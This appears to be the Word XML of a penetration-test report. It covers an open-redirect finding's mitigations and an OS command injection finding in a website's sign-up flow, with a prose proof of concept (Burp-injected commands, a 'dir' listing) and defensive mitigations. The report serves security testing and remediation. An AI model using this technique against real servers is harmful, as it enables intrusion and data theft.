    <w:p w14:paraId="11984286" w14:textId="705B447F" w:rsidR="00F10D33" w:rsidRPr="00F94EEA" w:rsidRDefault="00F10D33" w:rsidP="00E4025C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation of the app's resources. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A84EE" w14:textId="0140622F" w:rsidR="008C6127" w:rsidRPr="00F94EEA" w:rsidRDefault="00F10D33" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="008C6127" w:rsidRPr="00F94EEA">
        <w:t>itigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A746237" w14:textId="336C32C5"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 xml:space="preserve">Remove the redirection function from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>application, and</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> replace links to it with direct links to the relevant target URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE8A2C3" w14:textId="056A0EE2"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Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9E458C" w14:textId="08B1D3D3"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relative URLs in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strictly validate that the URL received is a relative URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DEE1CE" w14:textId="5D3ABC88"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URLs relative to the web root for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validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42895C6D" w14:textId="6A0DB06D"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absolute URLs for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E4025C">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E4025C">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> its redirects, and the redirection function should verify that the user-supplied URL begins with http://yourdomainname.com/ before issuing the redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312ECB83" w14:textId="77777777" w:rsidR="00F10D33" w:rsidRPr="00F94EEA" w:rsidRDefault="00F10D33" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsia="Times New Roman" w:hAnsi="David"/>
          <w:color w:val="333332"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53AFD664" w14:textId="07C169A3" w:rsidR="00A76C0E" w:rsidRDefault="00A76C0E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FE4BD6" w14:textId="33B01E5E" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0689DCE2" w14:textId="71EB90AE" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751A6775" w14:textId="10FFE446" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43E51324" w14:textId="461C3162" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429F4642" w14:textId="73571AA7" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA68036" w14:textId="61918815" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271E8032" w14:textId="5828CD96" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3063E203" w14:textId="02E263DC" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="421DAF6F" w14:textId="07E01E3B" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56604C9C" w14:textId="3C205C98" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OS Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408CF634" w14:textId="7497B9F3" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1B1992" w14:textId="77C56628" w:rsidR="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The team found an OS command injection vulnerability in the website. We found that in the process of signing </w:t>
      </w:r>
      <w:r w:rsidR="007E7323">
        <w:t>up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> new users, the user's details are being saved on the server using OS command. Since there is a possibility to check the details that were saved after the signing </w:t>
      </w:r>
      <w:r w:rsidR="007E7323">
        <w:t>up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is complete, an attacker could use this function in order to execute another OS command that will allow him to communicate with the server and </w:t>
      </w:r>
      <w:r w:rsidR="007E7323">
        <w:t>use it as he likes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4442B6A5" w14:textId="64FCF445" w:rsidR="007E7323" w:rsidRDefault="007E7323" w:rsidP="007E7323">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5733DA86" w14:textId="1E6D5BAD" w:rsidR="007E7323" w:rsidRDefault="00166E77" w:rsidP="007E7323">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>First, we need to go to the 'sign up' page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B908C8" w14:textId="2935BC81" w:rsidR="00166E77" w:rsidRDefault="00166E77" w:rsidP="00166E77">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="213BD31A" wp14:editId="0F1E580D">
            <wp:extent cx="4867275" cy="40671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275" cy="4067175"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8D5731" w14:textId="5FBA4EEB" w:rsidR="00166E77" w:rsidRDefault="00166E77" w:rsidP="00166E77">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">We notice that after the signing up is complete there's an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>optin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to see the details we just inserted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09727C1E" w14:textId="4FC3FF8C" w:rsidR="00166E77" w:rsidRDefault="00166E77" w:rsidP="00166E77">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65B88659" wp14:editId="7306E596">
            <wp:extent cx="4076700" cy="55816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700" cy="5581650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2F711B" w14:textId="1B0DA344" w:rsidR="00166E77" w:rsidRDefault="00166E77" w:rsidP="00166E77">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0839E5EC" wp14:editId="303652B2">
            <wp:extent cx="3971925" cy="17621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1762125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D2BF6" w14:textId="6DB4BC00" w:rsidR="00166E77" w:rsidRDefault="00166E77" w:rsidP="00166E77">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These details could be coming straight from the DB, however, they might also be saved on a different folder on the server, as sometimes happens. In that case, there will probably be some usage of an OS command in order to store these details on the server, and afterwards </w:t>
      </w:r>
      <w:r w:rsidR="00342D93">
        <w:t>retrieve them from the same folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380DEF93" w14:textId="77777777" w:rsidR="00342D93" w:rsidRDefault="00342D93" w:rsidP="00342D93">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>We'll create another user, but this time we'll try to concatenate another OS command in one of the fields, hoping that it will show up in our details on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA3386C" w14:textId="77777777" w:rsidR="00342D93" w:rsidRDefault="00342D93" w:rsidP="00342D93">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We'll catch our 'submit' request and then concatenate our own command next to the parameters that are being sent to the server. We'll use Burp in order to do that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3298D215" w14:textId="77777777" w:rsidR="00342D93" w:rsidRDefault="00342D93" w:rsidP="00342D93">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A98CCAF" wp14:editId="72F11BB4">
            <wp:extent cx="5133975" cy="33623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362325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11058FFF" w14:textId="77777777" w:rsidR="00342D93" w:rsidRDefault="00342D93" w:rsidP="00342D93">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Seems like the server received our message with no significant problems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95FB5C" w14:textId="77777777" w:rsidR="00342D93" w:rsidRDefault="00342D93" w:rsidP="00342D93">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22D89938" wp14:editId="7E0B639F">
            <wp:extent cx="5274310" cy="21685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68525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D9E95" w14:textId="77777777" w:rsidR="00421A01" w:rsidRDefault="00421A01" w:rsidP="00342D93">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now when we check our </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>details</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we can see that our command was executed successfully:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191D13EF" w14:textId="77777777" w:rsidR="00421A01" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DF33010" wp14:editId="51D0477C">
            <wp:extent cx="5274310" cy="4164330"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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64330"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5095CF99" w14:textId="77777777" w:rsidR="00421A01" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C3E9041" wp14:editId="2B0F0F53">
            <wp:extent cx="5274310" cy="3612515"/>
            <wp:effectExtent l="0" t="0" r="2540" b="698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2515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="499D45D5" w14:textId="72A3D53C" w:rsidR="00342D93" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>By using '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' command we can see all the folders on the server. Using Burp, we could create other users while concatenating various other OS commands, allowing us to use the server as we wish.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12385869" w14:textId="7FD8E108" w:rsidR="00421A01" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Business mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3DDB0E" w14:textId="0ECCC337" w:rsidR="00421A01" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker could use this vulnerability on order to steal data from the server, inject malwares to the server, and get a full control over the different server's resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069C9F4" w14:textId="41D225B9" w:rsidR="00421A01" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADD16EB" w14:textId="05DC0986" w:rsidR="00421A01" w:rsidRDefault="00195A0A" w:rsidP="00421A01">
      <w:pPr>
        <w:pStyle w:val="a3"/>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Pr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>If possible, never</w:t>
      </w:r>
      <w:r w:rsidR="00421A01">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> call OS commands from application-layer code, based on user's input.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Try using safer platform API's instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A474AB0" w14:textId="77777777" w:rsidR="00195A0A" w:rsidRPr="00421A01"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against a whitelist of permitted values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C090DD7" w14:textId="77777777" w:rsidR="00195A0A" w:rsidRPr="00421A01"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that the input is a number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C74DCCC" w14:textId="4EDADFD9" w:rsidR="00195A0A" w:rsidRPr="00195A0A" w:rsidRDefault="00195A0A" w:rsidP="00195A0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00421A01">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Validating that the input contains only alphanumeric characters, no other syntax or whitespace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EEF9D1" w14:textId="77777777" w:rsidR="00195A0A" w:rsidRPr="00421A01" w:rsidRDefault="00195A0A" w:rsidP="00195A0A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="333332"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B95A5E1" w14:textId="77777777" w:rsidR="00421A01" w:rsidRPr="00421A01" w:rsidRDefault="00421A01" w:rsidP="00421A01">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC595BC" w14:textId="451C281F" w:rsidR="00200384" w:rsidRPr="00200384" w:rsidRDefault="00200384" w:rsidP="00200384">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00200384" w:rsidRPr="00200384" w:rsidSect="004755E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828A" w14:textId="77777777" w:rsidR="00615479" w:rsidRDefault="00615479" w:rsidP="001703C3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="042568A1" w14:textId="77777777" w:rsidR="00615479" w:rsidRDefault="00615479" w:rsidP="001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391E" w14:textId="77777777" w:rsidR="00615479" w:rsidRDefault="00615479" w:rsidP="001703C3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="542BA24D" w14:textId="77777777" w:rsidR="00615479" w:rsidRDefault="00615479" w:rsidP="0017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BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD748A4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C5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1616BF30"/>
    <w:lvl w:ilvl="0" w:tplc="71BA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C23"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07B85D9E"/>
    <w:lvl w:ilvl="0" w:tplc="47EC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26B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15B2CCE0"/>
    <w:lvl w:ilvl="0" w:tplc="B1F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706"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB5C95B8"/>
    <w:lvl w:ilvl="0" w:tplc="E48A3E90">
      <w:start w:val="5"/>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2EC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="878EBF9C"/>
    <w:lvl w:ilvl="0" w:tplc="B73E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5BED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E44CE8A2"/>
    <w:lvl w:ilvl="0" w:tplc="A0321966">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5140"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E4482FB6"/>
    <w:lvl w:ilvl="0" w:tplc="C3DED2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923"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2D68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0C67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="40520E88"/>
    <w:lvl w:ilvl="0" w:tplc="0F64D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8381F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="583C790C"/>
    <w:lvl w:ilvl="0" w:tplc="E0DCF97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56D31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="111C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7038A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F9B8934E"/>
    <w:lvl w:ilvl="0" w:tplc="D97C0BCC">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706FF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D5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7E5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="98A8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D2B3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AE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52B36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D7B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54D30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6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5858"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D3A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82A1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0922DAA0"/>
    <w:lvl w:ilvl="0" w:tplc="B90E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7AA8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BDAAA0E8"/>
    <w:lvl w:ilvl="0" w:tplc="F6B669C2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8190" w:hanging="7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92BF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="015ED284"/>
    <w:lvl w:ilvl="0" w:tplc="A4F6FC6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1C96"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3B84C3E"/>
    <w:lvl w:ilvl="0" w:tplc="470CE63C">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6AF7470"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A11416BC"/>
    <w:lvl w:ilvl="0" w:tplc="5BCE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53CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11D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9EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DF677D4"/>
    <w:lvl w:ilvl="0" w:tplc="7C30A1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F1369"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A35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9DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3048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3A03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8070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9722D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EAE7ECA"/>
    <w:lvl w:ilvl="0" w:tplc="780C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C7A26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF0C8EF4"/>
    <w:lvl w:ilvl="0" w:tplc="8ED6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B6D5B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
